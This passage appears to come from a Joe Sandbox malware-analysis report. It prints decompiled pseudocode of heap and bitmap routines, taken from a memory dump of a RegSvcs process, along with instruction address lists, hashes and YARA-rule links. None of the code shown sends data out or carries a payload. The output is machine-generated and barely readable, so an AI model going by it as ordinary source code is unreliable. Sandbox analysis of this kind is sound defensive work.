									_push(_t141);
									E013BA80D(_t149, _v20, 0, 0);
									_t149 = _v8;
								}
								_t180 = _v12;
								_t127 = _a4;
							}
							_t173 = _t158 - (_t180 & 0x0000ffff);
						}
						if(_t173 <= 0) {
							return  *_t111;
						} else {
							_t175 = _v24;
							if( *_t175 != 0 || _a8 !=  *((intOrPtr*)(_t175 + 4)) - 1) {
								_t128 = _v16;
								_t73 =  *((intOrPtr*)(_t175 + 0x1c));
								_t151 = _t128 >> 5;
								_t164 = ( *((intOrPtr*)(_t175 + 4)) -  *((intOrPtr*)(_t175 + 0x14)) >> 5) - 1;
								_t118 =  !((1 << (_t128 & 0x0000001f)) - 1) &  *(_t73 + _t151 * 4);
								_t74 = _t73 + _t151 * 4;
								if(1 == 0) {
									while(_t151 <= _t164) {
										_t118 =  *(_t74 + 4);
										_t74 = _t74 + 4;
										_t151 = _t151 + 1;
										if(_t118 == 0) {
											continue;
										} else {
											goto L28;
										}
										goto L51;
									}
									if(_t118 != 0) {
										goto L28;
									} else {
										goto L40;
									}
								} else {
									L28:
									if(_t118 == 0) {
										_t77 = _t118 >> 0x00000010 & 0x000000ff;
										if(_t77 != 0) {
											_t79 = ( *(_t77 + 0x12d84d0) & 0x000000ff) + 0x10;
										} else {
											_t57 = (_t118 >> 0x18) + 0x12d84d0; // 0x10008
											_t79 = ( *_t57 & 0x000000ff) + 0x18;
										}
									} else {
										_t82 = _t118 & 0x000000ff;
										if(_t118 == 0) {
											_t79 = ( *((_t118 >> 0x00000008 & 0x000000ff) + 0x12d84d0) & 0x000000ff) + 8;
										} else {
											_t79 =  *(_t82 + 0x12d84d0) & 0x000000ff;
										}
									}
									_t153 = (_t151 << 5) + _t79;
									if( *((intOrPtr*)(_t175 + 8)) != 0) {
										_t153 = _t153 + _t153;
									}
									_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t153 * 4));
									L8:
									return _t70;
								}
							} else {
								_t88 = _v16;
								if( *((intOrPtr*)(_t175 + 8)) != 0) {
									_t88 = _t88 + _t88;
								}
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t88 * 4));
								if(_t111 == _t178) {
									L40:
									return 0;
								} else {
									do {
										if(_t127 == 0) {
											_t131 = _t158 -  *((intOrPtr*)(_t178 + 0x14));
										} else {
											_t167 =  *(_t178 - 8);
											_t123 = _t178 - 8;
											if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
												_t155 =  *(_t149 + 0x50) ^ _t167;
												_t167 = _t155;
												_t136 = _t155 >> 0x00000010 ^ _t155 >> 0x00000008 ^ _t155;
												_t149 = _v8;
												if(_t155 >> 0x18 != _t136) {
													_push(_t136);
													E013BA80D(_t149, _t123, 0, 0);
													_t149 = _v8;
												}
											}
											_t111 = _v28;
											_t158 = _a12;
											_t131 = _t158 - (_t167 & 0x0000ffff);
										}
										if(_t131 <= 0) {
											return _t178;
										} else {
											goto L24;
										}
										goto L51;
										L24:
										_t178 =  *_t178;
										_t127 = _a4;
									} while (_t111 != _t178);
									goto L40;
								}
							}
						}
					} else {
						goto L7;
					}
				}
				L51:
			}











































                                          0x0131ab4a
                                          0x0131ab51
                                          0x0131ab57
                                          0x0131ab5b
                                          0x0131ab5e
                                          0x0131ab61
                                          0x0131ab64
                                          0x0131ab67
                                          0x0131ab6c
                                          0x0131abbb
                                          0x0131abbb
                                          0x00000000
                                          0x0131ab6e
                                          0x0131ab6e
                                          0x0131ab73
                                          0x0131ad70
                                          0x0131ab79
                                          0x0131ab79
                                          0x0131ab83
                                          0x0131ab86
                                          0x0131ab8b
                                          0x0131ab8f
                                          0x0131ab9a
                                          0x0131ab9d
                                          0x0131aba4
                                          0x0136242c
                                          0x01362439
                                          0x0136243e
                                          0x0136243e
                                          0x0131abaa
                                          0x0131abad
                                          0x0131abad
                                          0x0131abb5
                                          0x0131abb5
                                          0x0131abb9
                                          0x0131abc6
                                          0x0131abca
                                          0x0131ad7a
                                          0x0131abd0
                                          0x0131abd0
                                          0x0131abda
                                          0x0131abdd
                                          0x0131abe2
                                          0x0131abe6
                                          0x0131abf1
                                          0x0131abf4
                                          0x0131abfb
                                          0x01362446
                                          0x01362453
                                          0x01362458
                                          0x01362458
                                          0x0131ac01
                                          0x0131ac04
                                          0x0131ac04
                                          0x0131ac0c
                                          0x0131ac0c
                                          0x0131ac10
                                          0x0131ad6b
                                          0x0131ac16
                                          0x0131ac16
                                          0x0131ac1c
                                          0x0131aca7
                                          0x0131acba
                                          0x0131acbd
                                          0x0131acc8
                                          0x0131acc9
                                          0x0131accc
                                          0x0131accf
                                          0x0131ad00
                                          0x0131ad04
                                          0x0131ad07
                                          0x0131ad0a
                                          0x0131ad0d
                                          0x00000000
                                          0x0131ad0f
                                          0x00000000
                                          0x0131ad0f
                                          0x00000000
                                          0x0131ad0d
                                          0x0131ad40
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131acd1
                                          0x0131acd1
                                          0x0131acd4
                                          0x0131ad16
                                          0x0131ad1b
                                          0x0131ad54
                                          0x0131ad1d
                                          0x0131ad20
                                          0x0131ad27
                                          0x0131ad27
                                          0x0131acd6
                                          0x0131acd6
                                          0x0131acdb
                                          0x0131ad39
                                          0x0131acdd
                                          0x0131acdd
                                          0x0131acdd
                                          0x0131acdb
                                          0x0131ace7
                                          0x0131aced
                                          0x0136247f
                                          0x0136247f
                                          0x0131acf6
                                          0x0131abbd
                                          0x0131abc3
                                          0x0131abc3
                                          0x0131ac2b
                                          0x0131ac2f
                                          0x0131ac32
                                          0x01362460
                                          0x01362460
                                          0x0131ac3b
                                          0x0131ac40
                                          0x0131ad42
                                          0x0131ad4a
                                          0x0131ac46
                                          0x0131ac46
                                          0x0131ac48
                                          0x0131ad5b
                                          0x0131ac4e
                                          0x0131ac4e
                                          0x0131ac51
                                          0x0131ac58
                                          0x0131ac5d
                                          0x0131ac66
                                          0x0131ac6d
                                          0x0131ac74
                                          0x0131ac77
                                          0x01362467
                                          0x01362472
                                          0x01362477
                                          0x01362477
                                          0x0131ac77
                                          0x0131ac7d
                                          0x0131ac83
                                          0x0131ac88
                                          0x0131ac88
                                          0x0131ac8c
                                          0x0131aca4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131ac8e
                                          0x0131ac8e
                                          0x0131ac90
                                          0x0131ac93
                                          0x00000000
                                          0x0131ac46
                                          0x0131ac40
                                          0x0131ac1c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131abb9
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6b0919870c4c8c0c033f8922f9ebf60fcfd96924c6e5a304aef5944c4ff96bea
                                          • Instruction ID: 7f285d1456922a439441002d034c7f2fd952fd5845d321b47b23cf30a4505ce2
                                          • Opcode Fuzzy Hash: 6b0919870c4c8c0c033f8922f9ebf60fcfd96924c6e5a304aef5944c4ff96bea
                                          • Instruction Fuzzy Hash: 8081F431A016998BDF28CE5DC89477ABBF1FB8031AF598159D941EF789D630ED04CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C25DD Relevance: .2, Instructions: 232COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E013C25DD(signed int __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				E013C2E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_t187 = 0x10;
				_t210 = (( *_t133 ^  *0x13e6110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x13e6110; // 0x7900493f
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x13e6110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_t154 = 0x3f;
				_v12 = E0133D340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E0133D0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						E0130FFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x12dac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x12dac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
					_t47 = _t175 + 0x12dac00; // 0x6060706
					_t48 = _t123 + 0x12dac00; // 0x6070708
					_t142 = _v16;
					if(E013C2FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E01312280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x13e6110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x13e6110; // 0x7900493f
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x13e6110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x13e6110 ^ _t168) & 0x7fff0000;
					}
					E013C241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}











































                                          0x013c25e6
                                          0x013c25f6
                                          0x013c25fb
                                          0x013c25fe
                                          0x013c2603
                                          0x013c2610
                                          0x013c2611
                                          0x013c2613
                                          0x013c262f
                                          0x013c2634
                                          0x013c2639
                                          0x013c2641
                                          0x013c2643
                                          0x013c2646
                                          0x013c2648
                                          0x013c2649
                                          0x013c2649
                                          0x013c2649
                                          0x013c2646
                                          0x013c263b
                                          0x013c263b
                                          0x013c263d
                                          0x013c263d
                                          0x013c2639
                                          0x013c2651
                                          0x013c2653
                                          0x013c2655
                                          0x013c2657
                                          0x013c265c
                                          0x013c2668
                                          0x013c266a
                                          0x013c2675
                                          0x013c267c
                                          0x013c2680
                                          0x013c2684
                                          0x013c2687
                                          0x013c2692
                                          0x013c2695
                                          0x013c2698
                                          0x013c269d
                                          0x013c26a2
                                          0x013c26a4
                                          0x013c26a4
                                          0x013c26a8
                                          0x013c26b2
                                          0x013c26c0
                                          0x013c26c6
                                          0x013c26c9
                                          0x013c26d1
                                          0x013c26d4
                                          0x013c26e2
                                          0x013c26ea
                                          0x013c26ed
                                          0x013c26f1
                                          0x013c26f6
                                          0x013c26f9
                                          0x013c2707
                                          0x013c270d
                                          0x013c2710
                                          0x013c2713
                                          0x013c2718
                                          0x013c271d
                                          0x013c271d
                                          0x013c2722
                                          0x013c2750
                                          0x013c2758
                                          0x013c275d
                                          0x013c2760
                                          0x013c2766
                                          0x013c2769
                                          0x013c276e
                                          0x013c2771
                                          0x013c2777
                                          0x013c277d
                                          0x013c2783
                                          0x013c2791
                                          0x013c27a7
                                          0x013c27a9
                                          0x013c27ab
                                          0x013c27ab
                                          0x013c27b1
                                          0x013c27b4
                                          0x013c27b4
                                          0x013c27bc
                                          0x013c27bf
                                          0x013c27c2
                                          0x013c27c2
                                          0x013c27db
                                          0x013c27df
                                          0x013c27e5
                                          0x013c27e8
                                          0x013c27f0
                                          0x013c27ff
                                          0x013c27ff
                                          0x013c27f2
                                          0x013c27f4
                                          0x013c27f4
                                          0x013c281a
                                          0x013c2824
                                          0x013c2826
                                          0x013c2834
                                          0x013c2843
                                          0x013c2858
                                          0x013c2858
                                          0x013c2866
                                          0x013c2866
                                          0x013c2873

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cdf0ed5b23e851dbe56685fd8fb1b1d5800ecf802c88c2cc637292e48ad20cc1
                                          • Instruction ID: e7710c2f0fee3db8d929b865217f17ee74baf56907fc1ced3ce6ae72acd5372d
                                          • Opcode Fuzzy Hash: cdf0ed5b23e851dbe56685fd8fb1b1d5800ecf802c88c2cc637292e48ad20cc1
                                          • Instruction Fuzzy Hash: 6A81F372A101158BCB19CF79C8916BEBBF1FF88324B1982ADD815EB2D6DA34D911CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C1D55 Relevance: .2, Instructions: 226COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E013C1D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x13d1070);
				E0134D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E013C337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E013C33B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E013396E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E013C33B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E0132E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x13e5880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E0132DFDF(_t91, 1, _t142);
					}
					return E0134D0D1(_t103);
				}
			}





































                                          0x013c1d55
                                          0x013c1d55
                                          0x013c1d57
                                          0x013c1d5c
                                          0x013c1d63
                                          0x013c1d66
                                          0x013c1d69
                                          0x013c1d6c
                                          0x013c1d6e
                                          0x013c1d71
                                          0x013c1d74
                                          0x013c1d77
                                          0x013c1d7a
                                          0x013c1d7d
                                          0x013c1d82
                                          0x013c1d85
                                          0x013c1d88
                                          0x013c1d8d
                                          0x013c1d90
                                          0x013c1d94
                                          0x013c1d96
                                          0x013c1d98
                                          0x013c1d98
                                          0x013c1d9b
                                          0x013c1d9e
                                          0x00000000
                                          0x013c1da1
                                          0x013c1da5
                                          0x013c1e78
                                          0x013c1e78
                                          0x013c1e82
                                          0x013c1e87
                                          0x013c1e8a
                                          0x013c1e8d
                                          0x013c1e92
                                          0x013c1e95
                                          0x013c1e98
                                          0x013c1e9b
                                          0x013c1ede
                                          0x013c1ee3
                                          0x013c1ee8
                                          0x013c1ef2
                                          0x013c1ef2
                                          0x013c1ef5
                                          0x013c1ef8
                                          0x013c1efe
                                          0x013c1f03
                                          0x00000000
                                          0x013c1f09
                                          0x013c1f0c
                                          0x013c1f0e
                                          0x013c1f11
                                          0x00000000
                                          0x013c1f17
                                          0x013c1f17
                                          0x013c1f1a
                                          0x013c1f31
                                          0x013c1f34
                                          0x013c1f3f
                                          0x013c1f42
                                          0x013c1f45
                                          0x013c1f47
                                          0x013c1f4a
                                          0x013c1f4d
                                          0x013c1f4f
                                          0x013c1f63
                                          0x013c1f65
                                          0x013c1f67
                                          0x00000000
                                          0x013c1f69
                                          0x013c1f69
                                          0x013c1f72
                                          0x013c1f72
                                          0x013c1f75
                                          0x013c1f77
                                          0x00000000
                                          0x00000000
                                          0x013c1f6e
                                          0x013c1f70
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c1f70
                                          0x013c1f83
                                          0x013c1f83
                                          0x013c1f85
                                          0x00000000
                                          0x013c1f85
                                          0x013c1f51
                                          0x013c1f53
                                          0x013c1f5a
                                          0x013c1f5c
                                          0x013c1f87
                                          0x013c1f87
                                          0x013c1f87
                                          0x013c1f8b
                                          0x013c1f8d
                                          0x013c1f90
                                          0x00000000
                                          0x013c1f90
                                          0x013c1f1c
                                          0x013c1f1c
                                          0x00000000
                                          0x013c1f22
                                          0x013c1f22
                                          0x013c1f25
                                          0x013c1f28
                                          0x013c1f97
                                          0x013c1f97
                                          0x013c1f9d
                                          0x013c1fa7
                                          0x013c1faa
                                          0x013c1fb1
                                          0x013c1fb9
                                          0x013c1fbd
                                          0x013c1fbe
                                          0x013c1fc0
                                          0x013c1f2a
                                          0x013c1f93
                                          0x013c1f93
                                          0x013c1f95
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c1f95
                                          0x013c1f28
                                          0x013c1f1c
                                          0x013c1f1a
                                          0x013c1f11
                                          0x013c1e9d
                                          0x013c1ea0
                                          0x013c1eae
                                          0x013c1eb4
                                          0x013c1ebc
                                          0x013c1ebc
                                          0x013c1ec2
                                          0x013c1ec8
                                          0x013c1ecd
                                          0x00000000
                                          0x013c1ed3
                                          0x013c1ed3
                                          0x00000000
                                          0x013c1ed3
                                          0x013c1ecd
                                          0x013c1dab
                                          0x013c1dab
                                          0x013c1db1
                                          0x013c1db3
                                          0x013c1db9
                                          0x013c1dbf
                                          0x013c1dc2
                                          0x013c1dda
                                          0x013c1ddd
                                          0x013c1de0
                                          0x013c1de9
                                          0x013c1dec
                                          0x013c1def
                                          0x013c1df1
                                          0x013c1df3
                                          0x013c1e0a
                                          0x013c1e0c
                                          0x013c1e0e
                                          0x00000000
                                          0x013c1e10
                                          0x013c1e10
                                          0x013c1e13
                                          0x013c1e16
                                          0x013c1e16
                                          0x013c1e19
                                          0x013c1e1c
                                          0x013c1e1e
                                          0x013c1e20
                                          0x00000000
                                          0x00000000
                                          0x013c1e22
                                          0x013c1e24
                                          0x00000000
                                          0x013c1e26
                                          0x00000000
                                          0x013c1e26
                                          0x00000000
                                          0x013c1e24
                                          0x013c1e30
                                          0x013c1e30
                                          0x00000000
                                          0x013c1e30
                                          0x013c1df5
                                          0x013c1df7
                                          0x013c1e01
                                          0x013c1e32
                                          0x013c1e34
                                          0x013c1e36
                                          0x00000000
                                          0x013c1e36
                                          0x013c1dc4
                                          0x013c1dc4
                                          0x00000000
                                          0x013c1dc6
                                          0x013c1dc6
                                          0x013c1dc9
                                          0x013c1dcf
                                          0x013c1dd1
                                          0x013c1e38
                                          0x013c1e38
                                          0x013c1e38
                                          0x013c1e38
                                          0x013c1dc4
                                          0x013c1dbb
                                          0x013c1dbb
                                          0x013c1dbb
                                          0x013c1dbb
                                          0x013c1e3a
                                          0x013c1e3a
                                          0x013c1e3d
                                          0x013c1e40
                                          0x013c1e43
                                          0x013c1e6f
                                          0x013c1fc7
                                          0x013c1fc7
                                          0x013c1e75
                                          0x013c1e75
                                          0x00000000
                                          0x013c1e75
                                          0x013c1e6f
                                          0x013c1fca
                                          0x013c1fca
                                          0x013c1fce
                                          0x013c1fd0
                                          0x013c1fd0
                                          0x013c1fd3
                                          0x013c1fd9
                                          0x013c1fde
                                          0x013c1fe4
                                          0x013c1fe4
                                          0x013c1fee
                                          0x013c1fee

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
